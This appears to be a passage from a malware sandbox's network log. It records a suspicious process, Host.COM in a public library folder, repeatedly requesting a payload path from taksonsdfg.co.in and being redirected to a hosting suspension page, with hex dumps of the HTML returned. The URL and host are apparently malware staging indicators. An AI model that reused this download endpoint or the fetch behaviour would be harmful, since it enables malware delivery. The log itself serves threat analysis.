                                                                  2024-11-26 08:39:38 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                                                  Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                                                  2024-11-26 08:39:38 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                                  Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                                                  2024-11-26 08:39:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  40192.168.2.749959108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:39:40 UTC179OUTGET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:39:40 UTC446INHTTP/1.1 302 Found
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  content-length: 771
                                                                  date: Tue, 26 Nov 2024 08:39:40 GMT
                                                                  server: LiteSpeed
                                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                  location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:39:40 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  41192.168.2.749965108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:39:42 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:39:42 UTC325INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  transfer-encoding: chunked
                                                                  date: Tue, 26 Nov 2024 08:39:42 GMT
                                                                  server: LiteSpeed
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:39:42 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                                                  Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                                                  2024-11-26 08:39:42 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                                  Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                                                  2024-11-26 08:39:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  42192.168.2.749972108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:39:44 UTC179OUTGET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:39:44 UTC446INHTTP/1.1 302 Found
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  content-length: 771
                                                                  date: Tue, 26 Nov 2024 08:39:44 GMT
                                                                  server: LiteSpeed
                                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                  location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:39:44 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  43192.168.2.749978108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:39:46 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:39:47 UTC325INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  transfer-encoding: chunked
                                                                  date: Tue, 26 Nov 2024 08:39:46 GMT
                                                                  server: LiteSpeed
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:39:47 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                                                  Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                                                  2024-11-26 08:39:47 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                                  Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                                                  2024-11-26 08:39:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  44192.168.2.749985108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:39:48 UTC179OUTGET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:39:49 UTC446INHTTP/1.1 302 Found
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  content-length: 771
                                                                  date: Tue, 26 Nov 2024 08:39:49 GMT
                                                                  server: LiteSpeed
                                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                  location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:39:49 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  45192.168.2.749991108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:39:50 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:39:51 UTC325INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  transfer-encoding: chunked
                                                                  date: Tue, 26 Nov 2024 08:39:51 GMT
                                                                  server: LiteSpeed
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:39:51 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                                                  Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                                                  2024-11-26 08:39:51 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                                  Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                                                  2024-11-26 08:39:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  46192.168.2.749998108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:39:53 UTC179OUTGET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:39:53 UTC446INHTTP/1.1 302 Found
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  content-length: 771
                                                                  date: Tue, 26 Nov 2024 08:39:53 GMT
                                                                  server: LiteSpeed
                                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                  location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:39:53 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  47192.168.2.750004108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:39:55 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:39:55 UTC325INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  transfer-encoding: chunked
                                                                  date: Tue, 26 Nov 2024 08:39:55 GMT
                                                                  server: LiteSpeed
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:39:55 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                                                  Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                                                  2024-11-26 08:39:55 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                                  Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                                                  2024-11-26 08:39:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  48192.168.2.750011108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:39:57 UTC179OUTGET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:39:57 UTC446INHTTP/1.1 302 Found
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  content-length: 771
                                                                  date: Tue, 26 Nov 2024 08:39:57 GMT
                                                                  server: LiteSpeed
                                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                  location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
